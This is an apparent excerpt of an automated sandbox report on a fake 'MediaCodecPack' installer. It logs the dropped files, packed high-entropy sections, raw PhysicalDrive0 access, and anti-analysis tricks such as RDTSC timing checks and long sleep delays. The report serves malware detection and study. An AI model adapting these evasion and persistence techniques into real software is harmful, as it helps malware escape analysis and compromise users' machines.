                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpWindow found: window name: TMainFormJump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MediaCodecPack_is1Jump to behavior
                    Source: steel.exe.3.exeStatic file information: File size 3295664 > 1048576
                    Source: Binary string: msvcp71.pdbx# source: is-CJLSG.tmp.1.dr
                    Source: Binary string: msvcr71.pdb< source: is-0BJ08.tmp.1.dr
                    Source: Binary string: msvcp71.pdb source: is-CJLSG.tmp.1.dr
                    Source: Binary string: MicrosoftWindowsGdiPlus-1.0.2600.1360-gdiplus.pdb source: is-SHN24.tmp.1.dr
                    Source: Binary string: msvcr71.pdb source: is-0BJ08.tmp.1.dr

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeUnpacked PE file: 2.2.mediacodecpack3.exe.400000.0.unpack .aitt5:ER;.ajtt5:R;.aktt5:W;.rsrc:R;.altt5:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeUnpacked PE file: 2.2.mediacodecpack3.exe.400000.0.unpack
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_004502C0 GetVersion,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_004502C0
                    Source: initial sampleStatic PE information: section where entry point is pointing to: .aitt5
                    Source: mediacodecpack3.exe.1.drStatic PE information: section name: .aitt5
                    Source: mediacodecpack3.exe.1.drStatic PE information: section name: .ajtt5
                    Source: mediacodecpack3.exe.1.drStatic PE information: section name: .aktt5
                    Source: mediacodecpack3.exe.1.drStatic PE information: section name: .altt5
                    Source: is-SHN24.tmp.1.drStatic PE information: section name: Shared
                    Source: is-5V918.tmp.1.drStatic PE information: section name: /4
                    Source: is-5V918.tmp.1.drStatic PE information: section name: /19
                    Source: is-5V918.tmp.1.drStatic PE information: section name: /35
                    Source: is-5V918.tmp.1.drStatic PE information: section name: /51
                    Source: is-5V918.tmp.1.drStatic PE information: section name: /63
                    Source: is-5V918.tmp.1.drStatic PE information: section name: /77
                    Source: is-5V918.tmp.1.drStatic PE information: section name: /89
                    Source: is-5V918.tmp.1.drStatic PE information: section name: /102
                    Source: is-5V918.tmp.1.drStatic PE information: section name: /113
                    Source: is-5V918.tmp.1.drStatic PE information: section name: /124
                    Source: MediaCodecPack.exe.2.drStatic PE information: section name: .aitt5
                    Source: MediaCodecPack.exe.2.drStatic PE information: section name: .ajtt5
                    Source: MediaCodecPack.exe.2.drStatic PE information: section name: .aktt5
                    Source: MediaCodecPack.exe.2.drStatic PE information: section name: .altt5
                    Source: sqlite3.dll.2.drStatic PE information: section name: /4
                    Source: sqlite3.dll.2.drStatic PE information: section name: /19
                    Source: sqlite3.dll.2.drStatic PE information: section name: /35
                    Source: sqlite3.dll.2.drStatic PE information: section name: /51
                    Source: sqlite3.dll.2.drStatic PE information: section name: /63
                    Source: sqlite3.dll.2.drStatic PE information: section name: /77
                    Source: sqlite3.dll.2.drStatic PE information: section name: /89
                    Source: sqlite3.dll.2.drStatic PE information: section name: /102
                    Source: sqlite3.dll.2.drStatic PE information: section name: /113
                    Source: sqlite3.dll.2.drStatic PE information: section name: /124
                    Source: C:\Users\user\Desktop\steel.exe.3.exeCode function: 0_2_004065C8 push 00406605h; ret 0_2_004065FD
                    Source: C:\Users\user\Desktop\steel.exe.3.exeCode function: 0_2_004040B5 push eax; ret 0_2_004040F1
                    Source: C:\Users\user\Desktop\steel.exe.3.exeCode function: 0_2_00408104 push ecx; mov dword ptr [esp], eax0_2_00408109
                    Source: C:\Users\user\Desktop\steel.exe.3.exeCode function: 0_2_00404185 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\steel.exe.3.exeCode function: 0_2_00404206 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\steel.exe.3.exeCode function: 0_2_0040C218 push eax; ret 0_2_0040C219
                    Source: C:\Users\user\Desktop\steel.exe.3.exeCode function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\steel.exe.3.exeCode function: 0_2_00404283 push 00404391h; ret 0_2_00404389
                    Source: C:\Users\user\Desktop\steel.exe.3.exeCode function: 0_2_00408F38 push 00408F6Bh; ret 0_2_00408F63
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_0040994C push 00409989h; ret 1_2_00409981
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_00483F88 push 00484096h; ret 1_2_0048408E
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_004062B4 push ecx; mov dword ptr [esp], eax1_2_004062B5
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_004104E0 push ecx; mov dword ptr [esp], edx1_2_004104E5
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_00412928 push 0041298Bh; ret 1_2_00412983
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_00494CAC push ecx; mov dword ptr [esp], ecx1_2_00494CB1
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_0040CE38 push ecx; mov dword ptr [esp], edx1_2_0040CE3A
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_004592D0 push 00459314h; ret 1_2_0045930C
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_0040F398 push ecx; mov dword ptr [esp], edx1_2_0040F39A
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_00443440 push ecx; mov dword ptr [esp], ecx1_2_00443444
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_0040546D push eax; ret 1_2_004054A9
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_0040553D push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_004055BE push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_00485678 push ecx; mov dword ptr [esp], ecx1_2_0048567D
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_0040563B push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_004056A0 push 00405749h; ret 1_2_00405741
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_004517F8 push 0045182Bh; ret 1_2_00451823
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_004519BC push ecx; mov dword ptr [esp], eax1_2_004519C1
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_00477B08 push ecx; mov dword ptr [esp], edx1_2_00477B09
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_00419C28 push ecx; mov dword ptr [esp], ecx1_2_00419C2D
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_0045FD1C push ecx; mov dword ptr [esp], ecx1_2_0045FD20
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_00499D30 pushad ; retf 1_2_00499D3F
                    Source: mediacodecpack3.exe.1.drStatic PE information: section name: .aitt5 entropy: 7.743465021339394
                    Source: MediaCodecPack.exe.2.drStatic PE information: section name: .aitt5 entropy: 7.743465021339394

                    Persistence and Installation Behavior

                    barindex
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive02_2_02B9E8A7
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\is-SHN24.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\is-UGFNO.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\is-5V918.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\gdiplus.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\sqlite3.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\msvcp71.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeFile created: C:\ProgramData\MediaCodecPack\MediaCodecPack.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\msvcr71.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpFile created: C:\Users\user\AppData\Local\Temp\is-SM9H7.tmp\_isetup\_setup64.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\is-0BJ08.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeFile created: C:\ProgramData\MediaCodecPack\sqlite3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\steel.exe.3.exeFile created: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpFile created: C:\Users\user\AppData\Local\Temp\is-SM9H7.tmp\_isetup\_shfoldr.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\is-CJLSG.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\uninstall\is-67S07.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpFile created: C:\Users\user\AppData\Local\Temp\is-SM9H7.tmp\_isetup\_iscrypt.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpFile created: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\uninstall\unins000.exe (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeFile created: C:\ProgramData\MediaCodecPack\MediaCodecPack.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeFile created: C:\ProgramData\MediaCodecPack\sqlite3.dllJump to dropped file

                    Boot Survival

                    barindex
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive02_2_02B9E8A7
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_00401951 GetLocalTime,StartServiceCtrlDispatcherA,lstrcmpiW,2_2_00401951
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_00423C0C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423C0C
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_00423C0C IsIconic,PostMessageA,PostMessageA,PostMessageA,SendMessageA,IsWindowEnabled,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,1_2_00423C0C
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_004241DC IsIconic,SetActiveWindow,SetFocus,1_2_004241DC
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_00424194 IsIconic,SetActiveWindow,1_2_00424194
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_00418384 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,1_2_00418384
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_0042285C SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,1_2_0042285C
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_00417598 IsIconic,GetCapture,1_2_00417598
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_0048393C IsIconic,GetWindowLongA,ShowWindow,ShowWindow,1_2_0048393C
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_00417CCE IsIconic,SetWindowPos,1_2_00417CCE
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_00417CD0 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,1_2_00417CD0
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_0041F118 GetVersion,SetErrorMode,LoadLibraryA,SetErrorMode,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,1_2_0041F118
                    Source: C:\Users\user\Desktop\steel.exe.3.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeRDTSC instruction interceptor: First address: 40D6C2 second address: 40D6C2 instructions: 0x00000000 rdtsc 0x00000002 sal si, FFF1h 0x00000006 mov eax, dword ptr [ebp-0Ch] 0x00000009 mov edx, dword ptr [ebp-30h] 0x0000000c rcr esi, FFFFFFD5h 0x0000000f movzx esi, bx 0x00000012 add edx, dword ptr [eax+0Ch] 0x00000015 lahf 0x00000016 cwde 0x00000017 mov eax, dword ptr [ebp-18h] 0x0000001a mov si, cx 0x0000001d movsx esi, si 0x00000020 mov esi, dword ptr [ebp-18h] 0x00000023 mov cl, byte ptr [ecx+esi] 0x00000026 jmp 00007F9D3CFF97B9h 0x0000002b mov byte ptr [edx+eax], cl 0x0000002e jmp 00007F9D3D01095Ch 0x00000033 mov eax, dword ptr [ebp-18h] 0x00000036 jmp 00007F9D3CFF84ACh 0x0000003b inc eax 0x0000003c ror cl, 0000007Bh 0x0000003f btc ecx, FFFFFF83h 0x00000043 mov dword ptr [ebp-18h], eax 0x00000046 jmp 00007F9D3D010FA0h 0x0000004b mov eax, dword ptr [ebp-28h] 0x0000004e cmp ebp, eax 0x00000050 or ch, cl 0x00000052 mov ecx, dword ptr [ebp-18h] 0x00000055 cmp di, 6D14h 0x0000005a cmp ecx, dword ptr [eax+10h] 0x0000005d jnc 00007F9D3CFF88D3h 0x00000063 mov eax, dword ptr [ebp-28h] 0x00000066 jmp 00007F9D3D004784h 0x0000006b mov ecx, dword ptr [ebp-1Ch] 0x0000006e add si, di 0x00000071 add ecx, dword ptr [eax+14h] 0x00000074 rdtsc
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: 2_2_0040D6B9 rdtsc 2_2_0040D6B9
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeCode function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,FreeLibrary,2_2_02B9E9AB
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeWindow / User API: threadDelayed 4819Jump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeWindow / User API: threadDelayed 5105Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\is-SHN24.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\is-UGFNO.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\is-5V918.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\gdiplus.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\msvcp71.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\msvcr71.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SM9H7.tmp\_isetup\_setup64.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.dll (copy)Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\is-0BJ08.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\is-CJLSG.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SM9H7.tmp\_isetup\_shfoldr.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\uninstall\is-67S07.tmpJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-SM9H7.tmp\_isetup\_iscrypt.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\uninstall\unins000.exe (copy)Jump to dropped file
                    Source: C:\Users\user\Desktop\steel.exe.3.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-5967
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_2-61773
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeAPI coverage: 4.8 %
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe TID: 4284Thread sleep count: 4819 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe TID: 4284Thread sleep time: -9638000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe TID: 5320Thread sleep time: -1200000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe TID: 4284Thread sleep count: 5105 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exe TID: 4284Thread sleep time: -10210000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\MediaCodecPack 1.1.22\mediacodecpack3.exeFile opened: PhysicalDrive0Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_00452A60 FindFirstFileA,GetLastError,1_2_00452A60
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_00474F88 FindFirstFileA,FindNextFileA,FindClose,1_2_00474F88
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_004980A4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,1_2_004980A4
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_00464158 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00464158
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_00462750 FindFirstFileA,FindNextFileA,FindClose,1_2_00462750
                    Source: C:\Users\user\AppData\Local\Temp\is-HRDEF.tmp\steel.exe.3.tmpCode function: 1_2_00463CDC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,1_2_00463CDC
